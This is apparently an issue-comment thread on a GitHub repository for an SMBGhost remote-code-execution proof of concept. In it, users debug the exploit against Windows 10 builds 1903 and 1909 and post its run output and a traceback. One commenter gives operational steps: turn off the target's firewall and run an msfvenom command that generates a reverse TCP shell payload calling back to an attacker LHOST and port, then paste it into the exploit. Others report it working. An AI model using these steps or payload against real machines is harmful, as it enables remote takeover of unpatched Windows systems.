Comments (8)
I have this problem, so what should I do?
from smbghost_rce_poc.
I have this problem, so what should I do?
Unfortunately I couldn't find a solution yet :/
from smbghost_rce_poc.
nvm, it's a bug. i changed the hal heap search and forgot to update that case. will post a fix shortly
from smbghost_rce_poc.
fix for this error has been pushed
from smbghost_rce_poc.
Thank you, I have another error now:
python exploit.py -ip 192.168.100.146
[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff7e380000000
[+] found PML4 self-ref entry 149
[+] found HalpInterruptController at fffff7e3800015b8
Traceback (most recent call last):
  File "exploit.py", line 465, in <module>
    do_rce(args.ip, args.port)
  File "exploit.py", line 428, in do_rce
    search_hal_heap(ip, port)
  File "exploit.py", line 356, in search_hal_heap
    PHALP_APIC_INTERRUPT = struct.unpack("<Q",buff[i + 0x38:i+0x40])[0]
struct.error: unpack requires a buffer of 8 bytes
from smbghost_rce_poc.
OK ppl, if you are reading this don't forget to
- close Win 10 b1903/1909 firewall
- run msfvenom as:
msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=192.168.113.121 LPORT=31337 -f python
and change the USER_PAYLOAD with this shellcode.
This code now works on b1903.
And I cannot make it exploit on 1909 machines.
from smbghost_rce_poc.
Ok, when I use the exploit on b1909 machines, python code works normally (I mean no error output). But the b1909 machine crashes and reboots.
from smbghost_rce_poc.
now works on 1909 thanks
from smbghost_rce_poc.